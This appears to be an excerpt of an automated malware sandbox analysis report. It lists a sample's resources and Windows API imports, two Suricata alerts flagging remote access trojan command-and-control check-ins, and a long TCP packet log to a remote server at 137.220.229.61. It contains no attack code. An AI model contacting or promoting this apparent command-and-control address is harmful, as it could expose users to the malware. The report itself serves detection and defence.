RT_GROUP_ICON	0x32710	0x4c	data	Russian	Russia	0.7763157894736842
RT_VERSION	0x3275c	0x350	data	English	United States	0.47523584905660377
RT_VERSION	0x32aac	0x3b0	data	Chinese	China	0.4523305084745763
RT_MANIFEST	0x32e5c	0x27b	ASCII text, with very long lines (635), with no line terminators	English	United States	0.5118110236220472

Imports

DLL	Import
COMCTL32.dll
KERNEL32.dll	GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
USER32.dll	CharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
GDI32.dll	GetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
SHELL32.dll	SHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
ole32.dll	CoInitialize, CreateStreamOnHGlobal, CoCreateInstance
OLEAUT32.dll	VariantClear, OleLoadPicture, SysAllocString
MSVCRT.dll	__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States
Chinese	China

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-04T14:48:52.519499+0100	2052875	ET MALWARE Anonymous RAT CnC Checkin	1	192.168.2.4	53816	137.220.229.61	9091	TCP
2025-01-04T14:50:00.195548+0100	2052875	ET MALWARE Anonymous RAT CnC Checkin	1	192.168.2.4	53836	137.220.229.61	9091	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2025 14:47:50.921454906 CET	53672	53	192.168.2.4	1.1.1.1
Jan 4, 2025 14:47:50.926259995 CET	53	53672	1.1.1.1	192.168.2.4
Jan 4, 2025 14:47:50.926330090 CET	53672	53	192.168.2.4	1.1.1.1
Jan 4, 2025 14:47:50.931137085 CET	53	53672	1.1.1.1	192.168.2.4
Jan 4, 2025 14:47:51.391940117 CET	53672	53	192.168.2.4	1.1.1.1
Jan 4, 2025 14:47:51.396931887 CET	53	53672	1.1.1.1	192.168.2.4
Jan 4, 2025 14:47:51.397574902 CET	53672	53	192.168.2.4	1.1.1.1
Jan 4, 2025 14:48:49.023248911 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:49.028032064 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.028114080 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:49.828409910 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.828433037 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.828443050 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.828454018 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.828464031 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.828475952 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:49.828483105 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.828499079 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.828510046 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.828516960 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:49.828526020 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:49.828526020 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.828538895 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.828547001 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:49.828573942 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:49.833376884 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.833388090 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.833399057 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.833408117 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:49.833422899 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:49.833446026 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.043203115 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.043215036 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.043226004 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.043236971 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.043272018 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.043292046 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.043433905 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.043498993 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.043509960 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.043519974 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.043530941 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.043540955 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.043541908 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.043565035 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.043586969 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.044343948 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.044362068 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.044373989 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.044384956 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.044394970 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.044405937 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.044413090 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.044442892 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.045150995 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.045161963 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.045172930 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.045209885 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.045500994 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.045511961 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.045522928 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.045551062 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.045582056 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.045876980 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.045886040 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.045929909 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.255661011 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.255675077 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.255686045 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.255697012 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.255721092 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.255747080 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.255778074 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.255891085 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.255901098 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.255917072 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.255928040 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.255934954 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.255939007 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.255949020 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.255979061 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.256370068 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.256381035 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.256386995 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.256407022 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.256416082 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.256417036 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.256427050 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.256450891 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.256479025 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.256953955 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.256964922 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.256975889 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.256992102 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.257153034 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.257162094 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.257170916 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.257188082 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.257203102 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.257421970 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.257431984 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.257440090 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.257476091 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.257729053 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.257739067 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.257747889 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.257757902 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.257766008 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.257775068 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.257802010 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.258342028 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.258389950 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.258399010 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.258428097 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.258447886 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.258456945 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.258466005 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.258496046 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.259265900 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.259291887 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.259319067 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.259336948 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.259341002 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.259377003 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.260603905 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.260629892 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.260641098 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.260653019 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.260663033 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.260673046 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.260674000 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.260684967 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.260696888 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.260715008 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.260740042 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.261250973 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.261261940 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.261272907 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.261301041 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.261358023 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.261368036 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.261403084 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.468187094 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468206882 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468218088 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468228102 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468238115 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468251944 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.468286037 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.468288898 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468303919 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468313932 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468322992 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468333006 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468339920 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.468370914 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.468492031 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468502045 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468511105 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468519926 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468529940 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468535900 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.468549967 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.468662024 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468671083 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468684912 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.468693018 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.468730927 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.469089985 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.469151020 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.469158888 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.469167948 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.469182968 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.469192028 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.469208002 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.469238043 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:50.469247103 CET	18852	53790	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:50.469383001 CET	53790	18852	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:52.514343023 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:52.519161940 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:52.519217014 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:52.519499063 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:52.524234056 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.387727022 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.388015985 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.392852068 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.392862082 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.392872095 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.697772026 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.697792053 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.697802067 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.697839975 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.697941065 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.697952986 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.697963953 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.698003054 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.698015928 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.698025942 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.698035955 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.698048115 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.698057890 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.698061943 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.698075056 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.702600002 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.702646017 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.912587881 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.912755013 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.912765980 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.912818909 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.913638115 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.913654089 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.913665056 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.913675070 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.913685083 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.913686037 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.913695097 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.913705111 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.913708925 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.913713932 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.913724899 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.913734913 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.913753986 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.914227009 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.914237022 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.914247036 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.914256096 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.914264917 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.914268017 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.914310932 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.914870024 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.914885998 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.914896965 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.914906979 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.914912939 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.914916992 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.914931059 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.914957047 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:53.915621996 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.917568922 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:53.917618036 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.127289057 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127300978 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127322912 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127331972 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127342939 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127353907 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127361059 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.127405882 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.127466917 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127475977 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127487898 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127497911 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127507925 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127510071 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.127531052 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.127762079 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127773046 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127782106 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127804041 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.127829075 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.127958059 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127969027 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.127978086 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.128001928 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.128098011 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.128108025 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.128138065 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.128216028 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.128226995 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.128237963 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.128253937 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.128264904 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.128276110 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.129019976 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.129060984 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.129128933 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.129137039 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.129147053 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.129158020 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.129168034 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.129190922 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.129221916 CET	53816	9091	192.168.2.4	137.220.229.61
Jan 4, 2025 14:48:54.130067110 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.130076885 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.130086899 CET	9091	53816	137.220.229.61	192.168.2.4
Jan 4, 2025 14:48:54.130096912 CET	9091	53816	137.220.229.61	192.168.2.4
